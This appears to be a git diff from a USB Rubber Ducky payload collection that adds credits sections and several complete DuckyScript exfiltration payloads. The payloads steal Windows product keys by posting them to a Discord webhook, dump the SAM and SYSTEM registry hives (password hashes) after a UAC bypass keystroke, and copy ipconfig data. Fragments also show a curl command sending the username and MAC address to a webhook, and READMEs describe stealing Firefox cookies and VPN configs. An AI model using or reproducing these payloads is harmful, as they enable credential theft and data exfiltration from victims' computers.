||||
STRINGLN name=$(id -un)
|
||||
DELAY 850
|
||||
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK
|
|
@ -30,3 +30,25 @@ Opens a shel, zip all zippable (R permission) content of the folder, send the zi
|
|||
* Set your dropbox access token
|
||||
* Set the folder path interessed (i.e. /Documents)
|
||||
* Change (if you think that it is necessary) the delay of the zipping operation
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -31,3 +31,25 @@ Opens a shel, zip all zippable (R permission) content of the log folder, send th
|
|||
* Set your dropbox access token
|
||||
* Change if needed the folder path interessed (i.e. /var/log)
|
||||
* Change (if you think that it is necessary) the delay of the zipping operation
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
|
|
|
@ -18,10 +18,28 @@ Opens a shell, get the network card name, get the network configuration using nm
|
|||
* Internet Connection
|
||||
* Dropbox Token
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Dropbox token
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -17,11 +17,29 @@ Opens a shell, get the network card name, get the network traffic using tcpdump,
|
|||
* Permissions
|
||||
* Internet Connection
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Dropbox token
|
||||
* Set the sniffing filter
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -18,10 +18,6 @@ A script used to exfiltrate photos using fswebcam shell command. The permissions
|
|||
* sudo permission
|
||||
* 'fswebcam' installed but you can install it with the payload
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Dropbox Token - You should change it into the script.sh file, line 7.
|
||||
|
@ -54,3 +50,25 @@ REM DELAY 5000
|
|||
REM DELAY Based On Internet Power
|
||||
DELAY 4000
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -18,10 +18,28 @@ Opens a shell, get the process info, set the Discord webhook configuration, send
|
|||
* Internet Connection
|
||||
* Discord Webhook
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Discord Webhook configuration
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -27,10 +27,28 @@ Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST
|
|||
* An internet connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Dropbox Webhook
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,95 @@
|
|||
# Exfiltrate Windows Product Key
|
||||
|
||||
Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook.
|
||||
|
||||
No administrator permissions are required to do this, isn't that absurd, right? :-)
|
||||
|
||||
![](./assets/1.png)
|
||||
|
||||
**Category**: Exfiltration
|
||||
|
||||
## Index
|
||||
|
||||
- [Introduction](#exfiltrate-windows-product-key)
|
||||
- [Note](#note)
|
||||
- [Dependencies](#dependencies)
|
||||
- [Settings](#settings)
|
||||
- [Payload Description](#payload-description)
|
||||
- [Product Key Types](#product-key-types)
|
||||
- [Sources](#sources)
|
||||
|
||||
## Note
|
||||
|
||||
Tested on:
|
||||
- Windows 11
|
||||
|
||||
## Dependencies
|
||||
|
||||
- Discord Webhook
|
||||
|
||||
## Settings
|
||||
|
||||
This portion of the payload serves as a user-defined configuration section where you should input your Discord Webhook URL. You should replace "example.com" with the actual Discord Webhook URL you want to use. The Webhook URL is the endpoint where your payload will send the acquired information related to the Windows Product Key, as well as its type, for exfiltration to a specified Discord channel or server. It's a crucial part of the payload that connects the data extraction process to your Discord platform for further analysis or actions.
|
||||
|
||||
```DuckyScript
|
||||
DEFINE #DISCORD_WEBHOOK example.com
|
||||
```
|
||||
|
||||
## Payload Description
|
||||
|
||||
Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself.
|
||||
|
||||
At the beginning of the payload, the DETECT_READY extension [[1](#sources)] is used to optimize the opening of a PowerShell session on the target.
|
||||
|
||||
The following commands are then executed to obtain the necessary information about the Product Key:
|
||||
|
||||
1. This command retrieves the currently in-use Product Key:
|
||||
|
||||
```powershell
|
||||
wmic path softwarelicensingservice get OA3xOriginalProductKey
|
||||
```
|
||||
|
||||
2. This command helps determine the type of key. You can refer to the [key types section](#key-types) for more details:
|
||||
|
||||
```powershell
|
||||
wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription
|
||||
```
|
||||
|
||||
The acquired information is stored in the `$exfiltration` variable, which is subsequently used to create the `$payload` object. This object is then utilized for exfiltration via a Discord Webhook.
|
||||
|
||||
**Exfiltration via Discord Webhook**:
|
||||
|
||||
The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution.
|
||||
|
||||
```powershell
|
||||
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
|
||||
```
|
||||
|
||||
**Exfiltration via USB Rubber Ducky Storage**:
|
||||
|
||||
If you use the exfiltration method set up to retain data using Rubber Ducky's USB storage, you will not have to make any changes.
|
||||
|
||||
## Product Key Types
|
||||
|
||||
When dealing with Windows Product Keys, it's essential to understand the different types and their characteristics:
|
||||
|
||||
- **OEM Keys** (*Original Equipment Manufacturer*):
|
||||
|
||||
**Transferability**: Not supposed to be transferable. These keys are typically tied to the prebuilt PC on which they were originally installed.
|
||||
**Usage**: Manufacturers use OEM keys to install Windows on new computers.
|
||||
**Procurement**: OEM keys can sometimes be found at discount key vendors, although their use on different hardware may be challenging.
|
||||
|
||||
- **Retail Keys** (*aka "Full Packaged Product" Keys*):
|
||||
|
||||
**Transferability**: Transferrable. These keys can be moved from one computer to another.
|
||||
**Cost**: Retail keys are often more expensive, often exceeding $100.
|
||||
**Hidden Keys**: In some cases, a computer may already have a retail key, perhaps from a previous Windows upgrade. Users might not be aware of this until they check.
|
||||
|
||||
Understanding these key types is crucial when working with Windows Product Keys, as it can impact their use, transferability, and compatibility with different hardware and scenarios.
|
||||
|
||||
*Note: Source of this info [[2](#sources)]*
|
||||
|
||||
## Sources
|
||||
|
||||
- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||
- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3
|
Binary file not shown.
After Width: | Height: | Size: 25 KiB |
|
@ -0,0 +1,82 @@
|
|||
REM_BLOCK
|
||||
###################################################
|
||||
# |
|
||||
# Title : Exfiltrate Windows Product Key |
|
||||
# Author : Aleff |
|
||||
# Version : 1.0 |
|
||||
# Category : Exfiltration |
|
||||
# Target : Windows 10-11 |
|
||||
# |
|
||||
###################################################
|
||||
END_REM
|
||||
|
||||
REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
|
||||
DEFINE #DISCORD_WEBHOOK example.com
|
||||
|
||||
REM_BLOCK
|
||||
How would you prefer to do the exfiltration?
|
||||
Via Discord Webhooks or via Rubber Ducky USB storage?
|
||||
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB_RUBBER_DUCKY_STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
|
||||
END_REM
|
||||
DEFINE #USB_RUBBER_DUCKY_STORAGE TRUE
|
||||
|
||||
|
||||
REM_BLOCK
|
||||
This definition allows the drive label to be parameterized dynamically.
|
||||
Instead of hardcoding the "DUCKY" label throughout the script, we use a defined variable at the beginning that can be easily adjusted.
|
||||
This way, if the drive label changes or needs to be customized for different environments, you only need to update this definition without altering multiple instances in the code. It’s an approach that enhances the script's flexibility and maintainability.
|
||||
END_REM
|
||||
DEFINE #DUCKY_DRIVE_LABEL DUCKY
|
||||
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN powershell
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN $key_detected=$(wmic path softwarelicensingservice get OA3xOriginalProductKey)+$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription);
|
||||
|
||||
IF_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
|
||||
STRINGLN
|
||||
$m=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
|
||||
echo $key_detected >> ${m}:\exfiltration.txt
|
||||
END_STRINGLN
|
||||
END_IF_DEFINED
|
||||
IF_NOT_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
|
||||
STRINGLN
|
||||
$hookUrl = "#DISCORD_WEBHOOK"
|
||||
$exfiltration = @"$key_detected"@
|
||||
$payload = [PSCustomObject]@{
|
||||
content = $exfiltration
|
||||
}
|
||||
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
|
||||
END_STRINGLN
|
||||
END_IF_DEFINED
|
|
@ -18,4 +18,26 @@ Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" a
|
|||
|
||||
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
|
||||
|
||||
`DEFINE DROPBOX_ACCESS_TOKEN "example"`
|
||||
`DEFINE DROPBOX_ACCESS_TOKEN "example"`
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -46,3 +46,25 @@ This script open the Firefox app, then go to downloads page and copy all, then o
|
|||
Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'
|
||||
}
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,12 @@
|
|||
# IP-OUT
|
||||
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Useful Tips
|
||||
|
||||
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||
|
||||
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
@ -0,0 +1,63 @@
|
|||
REM Title: IP-Out
|
||||
REM Author: Mavisinator30001
|
||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||
REM Target: Any Windows System
|
||||
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||
DEFINE #DRIVELABEL DUCKY
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
IF $_OS != WINDOWS
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRINGLN Powershell
|
||||
DELAY 1000
|
||||
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ATTACKMODE OFF
|
||||
HIDE_PAYLOAD
|
|
@ -0,0 +1,29 @@
|
|||
# Exfiltrate NTLM Hash - Windows ✅
|
||||
|
||||
A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
|
||||
|
||||
## Description
|
||||
|
||||
This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
|
||||
|
||||
|
||||
### Settings
|
||||
|
||||
- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
|
||||
- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Luu176 </h2>
|
||||
<div align="center">
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/luu176">
|
||||
<img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
|
||||
</a>
|
||||
<br>GitHub
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,81 @@
|
|||
REM_BLOCK
|
||||
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
|
||||
AUTHOR Luu176
|
||||
DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
|
||||
on the current Windows device) to the Rubber Ducky's SD card for further analysis.
|
||||
It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
|
||||
the defined storage drive on the Ducky device.
|
||||
END_REM
|
||||
|
||||
DEFINE #driveLabel DUCKY
|
||||
REM below you can set the number of blinks for the caps lock when finished (default 9)
|
||||
DEFINE #numBlinks 9
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||
IF ($_CAPSLOCK_ON == TRUE)
|
||||
CAPSLOCK
|
||||
END_IF
|
||||
GUI d
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||
DELAY 800
|
||||
ALT y
|
||||
DELAY 800
|
||||
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
|
||||
GUI d
|
||||
WAIT_FOR_CAPS_ON
|
||||
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
|
||||
VAR $i = 0
|
||||
WHILE ( $i < #numBlinks )
|
||||
DELAY 150
|
||||
CAPSLOCK
|
||||
$i = ( $i + 1 )
|
||||
END_WHILE
|
||||
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
@ -35,3 +35,24 @@ Then it cleans up traces of what you have done after.
|
|||
* Invoke Get-Content for get in plaintext the ProtonVPN .config content
|
||||
* Invoke-WebRequest will be entered in the Run Box to send the content
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,74 @@
|
|||
REM TITLE System Stealer
|
||||
REM AUTHOR mavisinator30001
|
||||
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
|
||||
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
|
||||
REM DISCLAIMER This is for educational purposes ONLY
|
||||
DELAY 1000
|
||||
ATTACKMODE HID STORAGE
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
REM Change $DRIVELABEL to the storage label of your duck
|
||||
DEFINE #DRIVELABEL DUCKY
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 1000
|
||||
CTRL-SHIFT-ENTER
|
||||
DELAY 750
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
|
||||
DELAY 250
|
||||
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
STRINGLN reg save HKLM\system $DriveLetter/system.save
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ELSE
|
||||
ATTACKMODE OFF
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
|
@ -8,7 +8,7 @@
|
|||
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="VERSION: 1.1" src="https://img.shields.io/badge/VERSION-1.1-green?style=for-the-badge">
|
||||
<img alt="VERSION: 1.2" src="https://img.shields.io/badge/VERSION-1.2-green?style=for-the-badge">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@ REM_BLOCK DOCUMENTATION
|
|||
Author: PlumpyTurkey
|
||||
Description: This payload sends you the target PC's Windows product key via Dropbox.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.1
|
||||
Version: 1.2
|
||||
Category: Exfiltration
|
||||
END_REM
|
||||
|
||||
|
@ -108,39 +108,4 @@ EXTENSION WINDOWS_ONLY
|
|||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION RUN_HOSTED_POWERSHELL
|
||||
